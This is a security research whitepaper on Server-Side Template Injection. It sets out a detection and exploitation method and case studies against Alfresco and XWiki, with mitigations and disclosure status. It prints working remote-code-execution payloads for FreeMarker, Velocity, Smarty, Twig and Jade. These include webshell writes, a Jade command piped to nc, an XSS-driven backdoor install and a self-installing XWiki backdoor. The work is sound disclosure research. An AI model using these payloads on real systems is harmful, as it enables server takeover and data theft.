Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable application into a potential pivot point.

Template Injection can arise both through developer error, and through the intentional exposure of templates in an attempt to offer rich functionality, as commonly done by wikis, blogs, marketing applications and content management systems. Intentional template injection is such a common use-case that many template engines offer a 'sandboxed' mode for this express purpose. This paper defines a methodology for detecting and exploiting template injection, and shows it being applied to craft RCE zerodays for two widely deployed enterprise web applications. Generic exploits are demonstrated for five of the most popular template engines, including escapes from sandboxes whose entire purpose is to handle user-supplied templates in a safe way.

For a slightly less dry account of this research, you may prefer to watch my Black Hat USA presentation on this topic. This research is also available as a printable whitepaper.



Web applications frequently use template systems such as Twig and FreeMarker to embed dynamic content in web pages and emails. Template Injection occurs when user input is embedded in a template in an unsafe manner. Consider a marketing application that sends bulk emails, and uses a Twig template to greet recipients by name. If the name is merely passed in to the template, as in the following example, everything works fine:
$output = $twig->render("Dear {first_name},", array("first_name" => $user->first_name) );
However, if users are allowed to customize these emails, problems arise:
$output = $twig->render($_GET['custom_email'], array("first_name" => $user->first_name) );
In this example the user controls the content of the template itself via the custom_email GET parameter, rather than a value passed into it. This results in an XSS vulnerability that is hard to miss. However, the XSS is just a symptom of a subtler, more serious vulnerability. This code actually exposes an expansive but easily overlooked attack surface. The output from the following two greeting messages hints at a server-side vulnerability:

custom_email={{7*7}}
49

custom_email={{self}}
Object of class __TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78db3538221c1145580ca4a5 could not be converted to string
What we have here is essentially server-side code execution inside a sandbox. Depending on the template engine used, it may be possible to escape the sandbox and execute arbitrary code.

This vulnerability typically arises through developers intentionally letting users submit or edit templates - some template engines offer a secure mode for this express purpose. It is far from specific to marketing applications - any features that support advanced user-supplied markup may be vulnerable, including wiki-pages, reviews, and even comments. Template injection can also arise by accident, when user input is simply concatenated directly into a template. This may seem slightly counter-intuitive, but it is equivalent to SQL Injection vulnerabilities occurring in poorly written prepared statements, which are a relatively common occurrence. Furthermore, unintentional template injection is extremely easy to miss as there typically won't be any visible cues. As with all input based vulnerabilities, the input could originate from out of band sources. For example, it may occur as a Local File Include (LFI) variant, exploitable through classic LFI techniques such as code embedded in log files, session files, or /proc/self/env.

The 'Server-Side' qualifier is used to distinguish this from vulnerabilities in client-side templating libraries such as those provided by jQuery and KnockoutJS. Client-side template injection can often be abused for XSS attacks, as detailed by Mario Heiderich. This paper will exclusively cover attacking server-side templating, with the goal of obtaining arbitrary code execution.

Template Injection Methodology

I have defined the following high level methodology to capture an efficient attack process, based on my experience auditing a range of vulnerable applications and template engines:


Detect

This vulnerability can appear in two distinct contexts, each of which requires its own detection method:

1. Plaintext context

Most template languages support a freeform 'text' context where you can directly input HTML. It will typically appear in one of the following ways:
smarty=Hello {}
Hello user1
freemarker=Hello ${username}
Hello newuser
This frequently results in XSS, so the presence of XSS can be used as a cue for more thorough template injection probes. Template languages use syntax chosen explicitly not to clash with characters used in normal HTML, so it's easy for a manual blackbox security assessment to miss template injection entirely. To detect it, we need to invoke the template engine by embedding a statement. There are a huge number of template languages but many of them share basic syntax characteristics. We can take advantage of this by sending generic, template-agnostic payloads using basic operations to detect multiple template engines with a single HTTP request:
smarty=Hello ${7*7}
Hello 49

freemarker=Hello ${7*7}
Hello 49

2. Code context

User input may also be placed within a template statement, typically as a variable name:
personal_greeting=username
Hello user01
This variant is even easier to miss during an assessment, as it doesn't result in obvious XSS and is almost indistinguishable from a simple hashmap lookup. Changing the value from username will typically either result in a blank result or the application erroring out. It can be detected in a robust manner by verifying the parameter doesn't have direct XSS, then breaking out of the template statement and injecting an HTML tag after it:

personal_greeting=username<tag>
Hello

personal_greeting=username}}<tag>
Hello user01 <tag>


Identify

After detecting template injection, the next step is to identify the template engine in use. This step is sometimes as trivial as submitting invalid syntax, as template engines may identify themselves in the resulting error messages. However, this technique fails when error messages are suppressed, and isn't well suited for automation. We have instead automated this in Burp Suite using a decision tree of language-specific payloads. Green and red arrows represent 'success' and 'failure' responses respectively. In some cases, a single payload can have multiple distinct success responses - for example, the probe {{7*'7'}} would result in 49 in Twig, 7777777 in Jinja2, and neither if no template language is in use.
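As an illustration, the decision tree can be modelled as a small classifier over probe responses. The function below is only a sketch (it is not Burp's implementation, and the function name is ours); the probe/response pairs are the ones described above.

```python
def classify(probe_results):
    """Guess the template engine from rendered probe output.

    probe_results maps each probe payload to the text it rendered to.
    """
    out = probe_results.get("{{7*'7'}}", "")
    if "7777777" in out:
        return "Jinja2"  # string multiplication repeats the string
    if "49" in out:
        return "Twig"    # Twig coerces '7' to a number: 7*'7' is 49
    if "49" in probe_results.get("${7*7}", ""):
        return "${}-style engine (e.g. FreeMarker, Velocity)"
    return "not detected"
```

In practice each branch would fan out into further engine-specific probes, following the green ('success') and red ('failure') arrows of the decision tree.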



Read

The first step after finding template injection and identifying the template engine is to read the documentation. The importance of this step should not be underestimated; one of the zeroday exploits to follow was derived purely from studious documentation perusal. Key areas of interest are:
  • 'For Template Authors' sections covering basic syntax.
  • 'Security Considerations' - chances are whoever developed the app you're testing didn't read this, and it may contain some useful hints.
  • Lists of builtin methods, functions, filters, and variables.
  • Lists of extensions/plugins - some may be enabled by default.


Explore

Assuming no exploits have presented themselves, the next step is to explore the environment to find out exactly what you have access to. You can expect to find both default objects provided by the template engine, and application-specific objects passed in to the template by the developer. Many template systems expose a 'self' or namespace object containing everything in scope, and an idiomatic way to list an object's attributes and methods.

If there's no builtin self object you're going to have to bruteforce variable names. I have created a wordlist for this by crawling GitHub for GET/POST variable names used in PHP projects, and publicly released it via SecLists and Burp Intruder's wordlist collection.
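Brute-forcing can be batched so that a single request tests many candidate names at once. The helpers below are a hypothetical sketch assuming Jinja/Twig-style {{...}} syntax, where an in-scope variable renders to its value and an undefined one renders to nothing:

```python
def probe_template(names):
    """Pack candidate variable names into a single probe string."""
    return ";".join("%s={{%s}}" % (n, n) for n in names)

def hits(names, rendered):
    """Given the rendered response, return the names that produced a value."""
    parts = dict(p.split("=", 1) for p in rendered.split(";"))
    return [n for n in names if parts.get(n)]
```

For example, probe_template(['self', 'request']) yields self={{self}};request={{request}}; feeding the rendered response back into hits() reveals which names are in scope.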

Developer-supplied objects are particularly likely to contain sensitive information, and may vary between different templates within an application, so this process should ideally be applied to every distinct template individually.


Attack

At this point you should have a firm idea of the attack surface available to you and be able to proceed with traditional security audit techniques, reviewing each function for exploitable vulnerabilities. It's important to approach this in the context of the wider application - some functions can be used to exploit application-specific features. The examples to follow will use template injection to trigger arbitrary object creation, arbitrary file read/write, remote file include, information disclosure and privilege escalation vulnerabilities.

Exploit Development

I have audited a range of popular template engines to show the exploit methodology in practice, and make a case for the severity of the issue. The findings may appear to show flaws in template engines themselves, but unless an engine markets itself as suitable for user-submitted templates the responsibility for preventing template injection ultimately lies with web application developers.

Sometimes, thirty seconds of documentation perusal is sufficient to gain RCE. For example, exploiting unsandboxed Smarty is as easy as:
{php}echo `id`;{/php}
Mako is similarly easy to exploit:
<%
import os
x=os.popen('id').read()
%>
${x}
However, many template engines try to prevent application logic from creeping into templates by restricting their ability to execute arbitrary code. Others explicitly try to restrict and sandbox templates as a security measure to enable safe processing of untrusted input. Between these measures, developing a template backdoor can prove quite a challenging process.


FreeMarker

FreeMarker is one of the most popular Java template languages, and the language I've seen exposed to users most frequently. This makes it all the more valuable that the official website explains the dangers of allowing user-supplied templates:
22. Can I allow users to upload templates and what are the security implications?

In general you shouldn't allow that, unless those users are system administrators or other trusted personnel. Consider templates as part of the source code just like *.java files are. If you still want to allow users to upload templates, here are what to consider:
Buried behind some lesser risks like Denial of Service, we find this:
  • The new built-in (Configuration.setNewBuiltinClassResolver, Environment.setNewBuiltinClassResolver): It's used in templates like "com.example.SomeClass"?new(), and is important for FTL libraries that are partially implemented in Java, but shouldn't be needed in normal templates. While new will not instantiate classes that are not TemplateModel-s, FreeMarker contains a TemplateModel class that can be used to create arbitrary Java objects. Other "dangerous" TemplateModel-s can exist in your class-path. Plus, even if a class doesn't implement TemplateModel, its static initialization will be run. To avoid these, you should use a TemplateClassResolver that restricts the accessible classes (possibly based on which template asks for them), such as TemplateClassResolver.ALLOWS_NOTHING_RESOLVER.
This warning is slightly cryptic, but it does suggest that the new builtin may offer a promising avenue of exploitation. Let's have a look at the documentation on new:
This built-in can be a security concern because the template author can create arbitrary Java objects and then use them, as far as they implement TemplateModel. Also the template author can trigger static initialization for classes that don't even implement TemplateModel. [snip] If you are allowing not-so-much-trusted users to upload templates then you should definitely look into this topic.
Are there any useful classes implementing TemplateModel? Let's take a look at the JavaDoc:
One of these class names stands out - Execute.
The details confirm it does what you might expect - takes input and executes it:
public class Execute
implements TemplateMethodModel

Gives FreeMarker the ability to execute external commands. Will fork a process, and inline anything that process sends to stdout in the template.
Using it is as easy as:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

uid=119(tomcat7) gid=127(tomcat7) groups=127(tomcat7)
This payload will come in useful later.


Velocity

Velocity, another popular Java templating language, is trickier to exploit. There is no 'Security Considerations' page to helpfully point out the most dangerous functions, and there is no obvious list of default variables either. The following screenshot shows the Burp Intruder tool being used to bruteforce variable names, with the variable name on the left in the 'payload' column and the server's output on the right.
The class variable (highlighted) looks particularly promising because it returns a generic Object. Googling it leads us to the VelocityTools documentation:

ClassTool: tool meant to use Java reflection in templates
default key: $class
One method and one property stand out:
$class.inspect(class/object/string) - returns a new ClassTool instance that inspects the specified class or object
$class.type - returns the actual Class being inspected
In other words, we can chain $class.inspect with $class.type to obtain references to arbitrary objects. We can then execute arbitrary shell commands on the target system using Runtime.exec(). This can be confirmed using the following template, designed to cause a noticeable time delay.
$class.inspect("java.lang.Runtime").type.getRuntime().exec("sleep 5").waitFor()
[5 second time delay]
Getting the shell command's output is a bit trickier (this is Java after all):
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("id"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($
#end

Smarty

Smarty is one of the most popular PHP template languages, and offers a secure mode for untrusted template execution. This enforces a whitelist of safe PHP functions, so templates can't directly invoke system(). However, it doesn't prevent us from invoking methods on any classes we can obtain a reference to. The documentation reveals that the $smarty builtin variable can be used to access various environment variables, including the location of the current file at $SCRIPT_NAME. Variable name bruteforcing quickly reveals the self object, which is a reference to the current template. There is very little documentation on this, but the code is all on GitHub. The getStreamVariable method is invaluable - it can be used to read any file the server has read+write permission on:

{self::getStreamVariable("file:///proc/self/loginuid")}
Furthermore, we can call arbitrary static methods. Smarty exposes a range of invaluable static classes, including Smarty_Internal_Write_File, which has the following method:
public function writeFile($_filepath, $_contents, Smarty $smarty)
This function is designed to create and overwrite arbitrary files, so it can easily be used to create a PHP backdoor inside the webroot, granting us near-complete control over the server. There's one catch - the third argument has a Smarty type hint, so it will reject any non-Smarty type inputs. This means that we need to obtain a reference to a Smarty object.
Further code review reveals that the self::clearConfig() method is suitable:
/**
 * Deassigns a single or all config variables
 *
 * @param  string $varname variable name or null
 * @return Smarty_Internal_Data current Smarty_Internal_Data (or Smarty or Smarty_Internal_Template) instance for chaining
 */
public function clearConfig($varname = null)
{
    return Smarty_Internal_Extension_Config::clearConfig($this, $varname);
}
The final exploit, designed to overwrite the vulnerable file with a backdoor, looks like:
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}


Twig

Twig is another popular PHP templating language. It has restrictions similar to Smarty's secure mode by default, with a couple of significant additional limitations - it isn't possible to call static methods, and the return values from all functions are cast to strings. This means we can't use functions to obtain object references like we did with Smarty's self::clearConfig(). Unlike Smarty, Twig has documented its self object (_self) so we don't need to bruteforce any variable names.

The _self object doesn't contain any useful methods, but does have an env attribute that refers to a Twig_Environment object, which looks more promising. The setCache method on Twig_Environment can be used to change the location Twig tries to load and execute compiled templates (PHP files) from. An obvious attack is therefore to introduce a Remote File Include vulnerability by setting the cache location to a remote server:

{{_self.env.setCache("ftp://")}}{{_self.env.loadTemplate("backdoor")}}

However, modern versions of PHP disable inclusion of remote files by default via allow_url_include, so this approach isn't much use.

Further code review reveals a call to the dangerous call_user_func function on line 874, in the getFilter method. Provided we control the arguments to this, it can be used to invoke arbitrary PHP functions.
public function getFilter($name)
{
    [snip]
    foreach ($this->filterCallbacks as $callback) {
        if (false !== $filter = call_user_func($callback, $name)) {
            return $filter;
        }
    }

    return false;
}

public function registerUndefinedFilterCallback($callable)
{
    $this->filterCallbacks[] = $callable;
}
Executing arbitrary shell commands is thus just a matter of registering exec as a filter callback, then invoking getFilter:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
uid=1000(k) gid=1000(k) groups=1000(k),10(wheel)

Twig (Sandboxed)

Twig's sandbox introduces additional restrictions. It disables attribute retrieval and adds a whitelist of functions and method calls, so by default we outright can't call any functions, even methods on a developer-supplied object. Taken at face value, this makes exploitation pretty much impossible. Unfortunately, the source tells a different story:
public function checkMethodAllowed($obj, $method)
{
    if ($obj instanceof Twig_TemplateInterface || $obj instanceof Twig_Markup) {
        return true;
    }
    [snip]
}
Thanks to this snippet we can call any method on objects that implement Twig_TemplateInterface, which happens to include _self. The _self object's displayBlock method offers a high-level gadget of sorts:
public function displayBlock($name, array $context, array $blocks = array(), $useBlocks = true)
{
    $name = (string) $name;

    if ($useBlocks && isset($blocks[$name])) {
        $template = $blocks[$name][0];
        $block = $blocks[$name][1];
    } elseif (isset($this->blocks[$name])) {
        $template = $this->blocks[$name][0];
        $block = $this->blocks[$name][1];
    } else {
        $template = null;
        $block = null;
    }

    if (null !== $template) {
        try {
            $template->$block($context, $blocks);
        } catch (Twig_Error $e) {
            [snip]
The $template->$block($context, $blocks); call can be abused to bypass the function whitelist and call any method on any object the user can obtain a reference to. The following code will invoke the vulnerableMethod method on the userObject object, with no arguments:

{{_self.displayBlock("id",_context,{"id":[userObject,"vulnerableMethod"]})}}
This can't be used to exploit the Twig_Environment->getFilter() method used earlier as there is no way to obtain a reference to the Environment object. However, it does mean that we can invoke methods on any objects the developer has passed into the template - the _context object's attributes can be iterated over to see if anything useful is in scope. The XWiki example later illustrates exploiting a developer-provided class.


Jade

Jade is a popular Node.js template engine. The CodePen website lets users submit templates in a number of languages by design, which makes it suitable for demonstrating a purely blackbox exploitation process. For a visual depiction of the following steps, please refer to the presentation video (link pending).

First off, confirm template execution:
= 7*7

49

Locate the self object:
= root

[object global]

Find a way to list object properties and functions:
- var x = root
- for(var prop in x)
    , #{prop}

, ArrayBuffer, Int8Array, Uint8Array, Uint8ClampedArray... global, process, GLOBAL, root

Explore promising objects:
- var x = root.process
- for(var prop in x)
    , #{prop}

, title, version, moduleLoadList... mainModule, setMaxListeners, emit, once

Bypass trivial countermeasures:
- var x = root.process.mainModule
- for(var prop in x)
    , #{prop}

CodePen removed the words below from your Jade because they could be used to do bad things. Please remove them and try again.
- var x = root.process
- x = x.mainModule
- for(var prop in x)
    , #{prop}

, id, exports, parent, filename, loaded, children, paths, load, require, _compile

Locate useful functions:
- var x = root.process
- x = x.mainModule.require
- x('a')

Cannot find module 'a'

- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc 80')

Case Study: Alfresco

Alfresco is a content management system (CMS) aimed at corporate users. Low privilege users can chain a stored XSS vulnerability in the comment system with FreeMarker template injection to gain a shell on the webserver. The FreeMarker payload created earlier can be used directly without any modification, but I've expanded it into a classic backdoor that executes the contents of the query string as a shell command:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex(url.getArgs())}

Low privilege users do not have permission to edit templates, but the stored XSS vulnerability can be used to force an administrator to install our backdoor for us. I injected the following JavaScript to launch this attack:
tok = /Alfresco-CSRFToken=([^;]*)/.exec(document.cookie)[1];
tok = decodeURIComponent(tok)
do_csrf = new XMLHttpRequest();"POST","http://"+document.domain+":8080/share/proxy/alfresco/api/node/workspace/SpacesStore/59d3cbdc-70cb-419e-a325-759a4c307304/formprocessor",false);
do_csrf.setRequestHeader('Content-Type','application/json; charset=UTF-8');
do_csrf.send('{"prop_cm_name":"folder.get.html.ftl","prop_cm_content":"<#assign ex=\\"freemarker.template.utility.Execute\\"?new()> ${ ex(url.getArgs())}","prop_cm_description":""}');

The GUID value of templates can change across installations, but it's easily visible to low privilege users via the 'Data Dictionary'. Also, the administrative user is fairly restricted in the actions they can take, unlike other applications where administrators are intentionally granted complete control over the webserver.

Note that according to Alfresco's own documentation, SELinux will do nothing to confine the resulting shell:
If you installed Alfresco using the setup wizard, the script included in the installation disables the Security-Enhanced Linux (SELinux) feature across the system.

Case Study: XWiki Enterprise

XWiki Enterprise is a feature-rich professional wiki. In the default configuration, anonymous users can register accounts on it and edit wiki pages, which can contain embedded Velocity template code. This makes it an excellent target for template injection. However, the generic Velocity payload created earlier will not work, as the $class helper is not available.
XWiki has the following to say about Velocity:
It doesn't require special permissions since it runs in a Sandbox, with access to only a few safe objects, and each API call will check the rights configured in the wiki, forbidding access to resources or actions that the current user shouldn't be allowed to retrieve/perform. Other scripting language require the user that wrote the script to have Programming Rights to execute them, but except this initial precondition, access is granted to all the resources on the server.
Without programming rights, it's impossible to instantiate new objects, except literals and those safely offered by the XWiki APIs. Nevertheless, the XWiki API is powerful enough to allow a wide range of applications to be safely developed, if "the XWiki way" is properly followed.
Programming Rights are not required for viewing a page containing a script requiring Programming Rights, rights are only needed at save time

In other words, XWiki doesn't just support Velocity - it also supports unsandboxed Groovy and Python scripting. However, these are restricted to users with programming rights. This is good to know because it turns privilege escalation into arbitrary code execution. Since we can only use Velocity, we are limited to the XWiki APIs.
The $doc class has some very interesting methods - astute readers may be able to identify an implied vulnerability in the following:

$ - saves the document
$doc.saveAsAuthor() - saves the document using the rights of the content author
The content author of a wiki page is the user who last edited it. The presence of distinct save and saveAsAuthor methods implies that the save method does not save as the author, but as the person currently viewing the page. In other words, a low privilege user can create a wiki page that, when viewed by a user with programming rights, silently modifies itself and saves the modifications with those rights. I decided to inject the following Python backdoor:
{{python}}from subprocess import check_output
q = request.get('q') or 'true'
q = q.split(' ')
print ''+check_output(q)+''
{{/python}}

We just need to wrap it with some code to grab the privileges of a passing administrator:
innocent content
#if( $doc.hasAccessLevel("programming") )
        innocent content
        {{python}}from subprocess import check_output
        q = request.get('q') or 'true'
        q = q.split(' ')
        print ''+check_output(q)+''
        {{/python}}
        $
#end
As soon as a wiki page with this content is viewed by a user with programming rights, it will backdoor itself. Any user who subsequently views the page can use it to execute arbitrary shell commands:

Although I chose to exploit $, it is far from the only promising API method. Other potentially useful methods include $xwiki.getURLContent(""), $request.getCookie("password").getValue(), and $services.csrf.getToken().

Mitigations - Templating Safely

If user-supplied templates are a business requirement, how should they be implemented? We have already seen that regexes are not an effective defense, and parser-level sandboxes are error prone. The lowest risk approach is to simply use a trivial template engine such as Mustache, or Python's Template. MediaWiki has taken the approach of executing users' code using a sandboxed Lua environment where potentially dangerous modules and functions have been outright removed. This strategy appears to have held up well, given the lack of people compromising Wikipedia. In languages such as Ruby it may be possible to emulate this approach using monkey-patching.
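To illustrate why a trivial engine is low risk, Python's string.Template performs pure substitution with no expression language, so even a fully user-controlled template has nothing to evaluate:

```python
from string import Template

# Normal use: plain placeholder substitution.
greeting = Template("Dear $first_name,").substitute(first_name="Alice")
assert greeting == "Dear Alice,"

# A template-injection probe has no engine to evaluate it: ${7*7} is not a
# valid placeholder, and safe_substitute leaves malformed patterns intact.
probe = Template("Hello ${7*7}").safe_substitute()
assert probe == "Hello ${7*7}"   # not "Hello 49"
```

The trade-off is expressiveness: there are no loops, conditionals, or method calls, which is exactly what makes the attack surface disappear.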

Another, complementary approach is to concede that arbitrary code execution is inevitable and sandbox it inside a locked-down Docker container. Through the use of capability-dropping, read-only filesystems, and kernel hardening it is possible to craft a 'safe' environment that is difficult to escape from.

Issue Status

I do not consider the exploits shown for FreeMarker, Jade, Velocity and unsandboxed Twig to be vulnerabilities in those languages, in the same way that the possibility of SQL injection is not the fault of MySQL. The following table shows the current status of the vulnerabilities disclosed in this paper.

  • Alfresco: Disclosure acknowledged, patch in development
  • XWiki: No fix available - XWiki developers do not have a consensus that this is a bug
  • Smarty sandbox: Fixed in 3.1.24
  • Twig sandbox: Fixed in 1.20.0


Conclusion

Template Injection is only apparent to auditors who explicitly look for it, and may incorrectly appear to be low severity until resources are invested in assessing the template engine's security posture. This explains why Template Injection has remained relatively unknown up till now, and its prevalence in the wild remains to be determined.

Template engines are server-side sandboxes. As a result, allowing untrusted users to edit templates introduces an array of serious risks, which may or may not be evident in the template system's documentation. Many modern technologies designed to prevent templates from doing harm are currently immature and should not be relied on except as a defense in depth measure. When Template Injection occurs, regardless of whether it was intentional, it is frequently a critical vulnerability that exposes the web application, the underlying webserver, and adjacent network services.

By thoroughly documenting this issue, and releasing automated detection via Burp Suite, we hope to raise awareness of it and significantly reduce its prevalence.